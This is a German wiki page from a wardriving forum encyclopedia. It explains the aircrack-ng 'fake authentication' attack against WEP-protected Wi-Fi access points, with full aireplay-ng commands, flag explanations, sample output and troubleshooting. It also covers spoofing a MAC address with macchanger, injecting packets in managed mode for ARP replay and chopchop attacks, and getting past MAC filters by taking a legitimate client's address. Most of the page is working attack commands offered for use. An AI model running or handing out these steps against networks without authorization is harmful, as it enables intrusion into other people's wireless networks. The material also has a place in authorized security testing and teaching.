Fake authentication

Aus Wardriving-Forum.de Enzyklopädie

Inhaltsverzeichnis 1 Fake Authentication 2 Beschreibung 2.1 Beispiel 2.2 Anwendungsbeispiel 2.3 Tips 2.4 MAC-Adresse ändern 2.5 Injecten im Managed Mode 3 Beispiel einer erfolgreicher Authentication 3.1 Lösungsansätze 3.2 Fehlgeschlagene Authentications erkennen 4 Troubleshooting 4.1 Reassociating on periodic basis 4.2 Fehlermeldung "AP rejects open-system authentication" 4.3 Fehlermeldung "Denied (code 10), open (no WEP)?" 4.4 Fehlermeldung "Denied (Code 1) is WPA in use?" 4.5 MAC Filter auf dem AP aktiviert 4.6 Warten auf Beacon Frame 4.7 Airodump-ng zeigt keine ESSID an 4.8 Fehlermeldung "code (XX)" 4.9 Weitere Probleme und Lösungen

[Bearbeiten] Fake Authentication

[Bearbeiten] Beschreibung

Die "Fake Authentication Attack" erlaubt zwei Arten von WEP-Authentifizierung (Open System und Shared Key) sowie mit dem Access Point (AP). Das macht nur dann Sinn, wenn es im Augenblick keine verbundenen Clients gibt und die MAC-Adresse des Clients bekannt ist. Ein Fake-Authentifizierungs Angriff erzeugt keine ARP-Pakete und funktioniert nicht bei WPA/WPA2 Access Points um sich zu verbinden/ authentifizieren.

[Bearbeiten] Beispiel

  aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 -y sharedkeyxor ath0

Erklärung:

 *-1 heißt "fake authentication"
 *0 reassociation timing in seconds
 *-e teddy ist derName des WLAN Netzes.
 *-a 00:14:6C:7E:40:80 ist die MAC-Adresse des AP'S
 *-h 00:09:5B:EC:EE:F2 ist die MAC-Adresse unserer Karte
 *-y sharedkeyxor ist der Name des Files der die PRGA xor bits beinhaltet. Wird nur bei Shared Key Authentication benötigt.
 *ath0 ist der Name der WLAN-Schnittstelle

Andere Variante für "wählerische" AP`s:

 aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0

Erklärung:

 * 6000 - Reauthenticate very 6000 seconds.  The long period also causes keep alive packets to be sent.
 * -o 1 - Send only one set of packets at a time.  Default is multiple and this confuses some APs.
 * -q 10 - Send keep alive packets every 10 seconds.

[Bearbeiten] Anwendungsbeispiel

Das Fehlen der Verbindung mit dem Access Point ist der häufigste Grund, warum eine Injection fehlschlägt.

Zum assoziieren mit einem Access Point verwenden wir eine Fake-Authentifizierung:

  aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0

Erklärung:

 *-1 bedeutet "fake authentication"
 *0 reassociation timing in Sekunden
 *-e teddy ist der Name des WLAN-Netzwerkes
 *-a 00:14:6C:7E:40:80 MAC-Adresse des AP's
 *-h 00:09:5B:EC:EE:F2 MAC-Adresse unserer WLAN-Karte
 *ath0 Name der WLAN-Schnittstelle

Eine erfolgreiche Injection sieht so aus:

 18:18:20  Sending Authentication Request
 18:18:20  Authentication successful
 18:18:20  Sending Association Request
 18:18:20  Association successful :-)

Andere Variante für "wählerische" AP`s:

 aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0

Erklärung:

 * 6000 - Reauthenticate very 6000 seconds.  The long period also causes keep alive packets to be sent.
 * -o 1 - Send only one set of packets at a time.  Default is multiple and this confuses some APs.
 * -q 10 - Send keep alive packets every 10 seconds.

Eine erfolgreiche Injection sieht so aus:

 18:22:32  Sending Authentication Request
 18:22:32  Authentication successful
 18:22:32  Sending Association Request
 18:22:32  Association successful :-)
 18:22:42  Sending keep-alive packet
 18:22:52  Sending keep-alive packet
 # and so on.

Beispiel einer "Shared Key Authentication". Vorausgesetzt wird dass wir die .xor Datei mit dem PGRA haben. Wie man an der PGRA kommt wird beim Fragmentation Angriff erklärt

  aireplay-ng -1 0  -e teddy -y sharedkey-04-00-14-6C-7E-40-80.xor -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0

Erklärung:

 * -1 bedeutet "fake authentication"
 * 0 bedeutetnur einmal authentifizieren
 * -e teddy ist die SSID des Netzwerkes.
 * -y sharedkey-04-00-14-6C-7E-40-80.xor ist der Name der Datei, die die "PRGA xor bits" beinhaltet
 * -a 00:14:6C:7E:40:80 MAC-Adresse des AP'S
 * -h 00:09:5B:EC:EE:F2 
  * ath0 ist der WLAN-Schnittstelle

Eine erfolgreiche shared key authentication sieht so aus:

  11:44:55  Sending Authentication Request
  11:44:55  AP rejects open-system authentication
  Part1: Authentication
  Code 0 - Authentication SUCCESSFUL :)
  Part2: Association
  Code 0 - Association SUCCESSFUL :)

Wenn das soweit alles passt, können wir mit den Standard-Injection Techniken weitermachen

[Bearbeiten] Tips

[Bearbeiten] MAC-Adresse ändern

Die MAC-Adresse der WLAN-Karte kann leicht geändert werden, es ist aber notwendig den Adapter kurz zu stoppen, die MAC zu ändern und anschließend Adapter wieder starten.

  ip link set dev wifi0 down
  macchanger --mac=xx:xx:xx:xx:xx:xx wifi0
  ip link set dev wifi0 up

Erklärung: wifi0 ist mein Adapter und xx:xx:xx:xx:xx:xx die gewünschte MAC-Adresse.

[Bearbeiten] Injecten im Managed Mode

Mit gepatchten madwifi-old CVS 2005-08-14 ist es möglich, Pakete im Managed Modus zu injizieren (der WEP-Schlüssel selbst spielt keine Rolle, solange die AP Open-System-Authentifizierung akzeptiert ). Statt Angriff 1 zu starten injizieren wir über die athXraw Schnittstelle

 ifconfig ath0 down hw ether 00:11:22:33:44:55
 iwconfig ath0 mode Managed essid 'the ssid' key AAAAAAAAAA
 ifconfig ath0 up

 sysctl -w dev.ath0.rawdev=1
 ifconfig ath0raw up
 airodump-ng ath0raw out 6

Jetzt können wir einen ARP Request Replay oder KoreK chopchop Angriff starten. (aireplay-ng ersetzt ath0 automatisch durch ath0raw):

 aireplay-ng -3 -h 00:11:22:33:44:55 -b 00:13:10:30:24:9C ath0

 aireplay-ng -4 -h 00:10:20:30:40:50 -f 1 ath0

[Bearbeiten] Beispiel einer erfolgreicher Authentication

Manchmal kann es Sinn machen sich eine erfolgreiche Authentication genauer anzuschauen wenn man nicht weiterkommt. Hier zwei erfolgreiche Captures zum Download, einfach mal genauer mit Wireshark anschauen.

open authentication: http://download.aircrack-ng.org/wiki-files/other/wep.open.system.authentication.cap
shared key authentication: http://download.aircrack-ng.org/wiki-files/other/wep.shared.key.authentication.cap

[Bearbeiten] Lösungsansätze

[Bearbeiten] Fehlgeschlagene Authentications erkennen

Hier ist ein Beispiel, wie eine Fehlgeschlagene Anmeldung aussieht:

 8:28:02  Sending Authentication Request
 18:28:02  Authentication successful
 18:28:02  Sending Association Request
 18:28:02  Association successful :-)
 18:28:02  Got a deauthentication packet!
 18:28:05  Sending Authentication Request
 18:28:05  Authentication successful
 18:28:05  Sending Association Request
 18:28:10  Sending Authentication Request
 18:28:10  Authentication successful
 18:28:10  Sending Association Request

Die Meldung "Got a deauthentication packet" wiederholen sich. Es macht keinen Sinn weiterzumachen bis das nicht richtig läuft. Zu den Lösungsansätzen komme ich gleich.

Eine andere Möglichkeit fehlgeschlagene Authentifizierungen festzustellen ist das Tool tcpdump. Neue Session während des Injecting öffnen und diesen Befehl ausprobieren:

  tcpdump -n -e -s0 -vvv -i ath0

Eine tcpdump Fehlermeldung wäre folgende:

 11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:0f:b5:46:11:19 SA:00:14:6c:7e:40:80 DeAuthentication: Class 3 frame received from nonassociated station

Der AP (00:14:6c:7e:40:80) sagt der Source (00:0f:b5:46:11:19) dass wir nicht verbunden sind, d.h. der AP wird keine injected Packets von unserer Source annehmen oder verarbeiten.

Falls wir nur die DeAuth Pakete auswählen möchten können wir diesen Befehl nehmen:

  tcpdump -n -e -s0 -vvv -i ath0 | grep DeAuth  

Vielleicht musst du den Syntax von "DeAuth" etwas verändern, um die exakten Pakete herauszupicken, die du willst.

[Bearbeiten] Troubleshooting

[Bearbeiten] Reassociating on periodic basis

Evtl. bekommt man bei manchen AP`s in regelmäßigen Abständen "Disassociation Events".

Manchmal bekommst du dauernd Disassociations. Manche Access Points erfordern alle 30 Sekunden eine Reassociation. Dies geschieht durch folgenden Befehl:

 aireplay-ng -1 30 -e 'the essid' -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0

[Bearbeiten] Fehlermeldung "AP rejects open-system authentication"

  15:46:53  Sending Authentication Request
  15:46:53  AP rejects open-system authentication
  Please specify a PRGA-file (-y).

Fragmentation Angriff versuchen

[Bearbeiten] Fehlermeldung "Denied (code 10), open (no WEP)?"

Fake Authentication funktioniert nicht bei einem unverschlüsselten AP. Kein WEP = kein Schlüssel der zu errechnen ist ;-)

[Bearbeiten] Fehlermeldung "Denied (Code 1) is WPA in use?"

  Sending Authentication Request
  Authentication successful
  Sending Association Request
  Association successful
  Denied (Code 1) is WPA in use?

Fake Authentication funktioniert NUR mit WEP und NICHT bei WPA/WPA2 AccesPoint`s.

[Bearbeiten] MAC Filter auf dem AP aktiviert

Wenn eine Fake-Authentifizierung erfolgslos bleibt könnte ein MAC-Filter Schuld sein, sodass der Access Point nur Verbindungen von bestimmten MAC-Adressen akzeptiert.

In diesem Fall müssen wir eine gültige MAC-Adresse besorgen und mit dieser injecten. Die Fake Authentication sollte nicht durchgeführt werden während der echte Client noch aktiv ist. Das könnte zu Konflikten im Netz kommen da jede MAC nur einmal vorhanden sein darf.

[Bearbeiten] Warten auf Beacon Frame

System friert ein oder eine Zeile erscheint "Waiting for beacon frame" und nichts weiter passiert.

Folgende Probleme könnten vorliegen:

• Die WLAN-Karte ist auf einen anderen Kanal gesetzt, als sich der AP befindet. Lösung: Benutzen "iwconfig" um es zu überprüfen und den Kanal einzustellen.
• Die Karte scannt Kanäle. Lösung: Starte airodump mit der "-c" oder "--channel" Möglichkeit und setze es auf den selben Kanal wie den AP.
• Die ESSID ist falsch. Lösung: Gebe die korrekte ein. Wenn sie Lehrzeichen oder Sonderzeichen beinhaltet, setze sie in Auführungsstriche. Für alle Details schau hier: [entry].
• Die BSSID ist falsch. Lösung: Gebe die korrekte ein.
• Du bist zu weit vom AP entfernt und empfängst keine Beacons. Lösung: Du kannst tcpdump und/oder airodump-ng benutzen um sicher zu gehen, dass du Beacons empfängst. Wenn nicht, geh näher.
• Du empfängst keine Beacons von dem AP. Lösung: Benutze "tcpdump -n -vvv -e -s0 -i <interface name>" um sicher zu gehen, dass du Beacons empfängst. Wenn du alle Gründe oben ausgeschlossen hast, könnten es die Treiber sein, oder deine WLAN-Karte ist nicht im Monitor Mode.

[Bearbeiten] Airodump-ng zeigt keine ESSID an

Cool bleiben...wenn sich ein Client mit dem AP verbindet wird die ESSID angezeigt.

[Bearbeiten] Fehlermeldung "code (XX)"

Hier eine Übersicht: http://www.gthill.com/managementframes.pdf

[Bearbeiten] Weitere Probleme und Lösungen

Stelle sicher das:

• Stelle sicher, dass du nah genug an dem AP dran bist. You can confirm that you can communicate with the specific AP.

• Stelle sicher, dass du eine wirkliche MAC benutzt. (see discussion above)

• Der WLAN-Karten-Treiber ist richtig gepached und instaliert. Benutze den Injection Test um sicher zu gehen, dass deine Karte Injection unterstützt.

• Die Karte ist auf den selben channel eingstellt, wie der AP. Benutze "iwconfig" um es zu überprüfen.

• Die BSSID und ESSID (-a / -e Optionen) sind korrekt.

• Wenn es eine Prism2 ist, gehe sicher, dass die Firmware upgedated ist.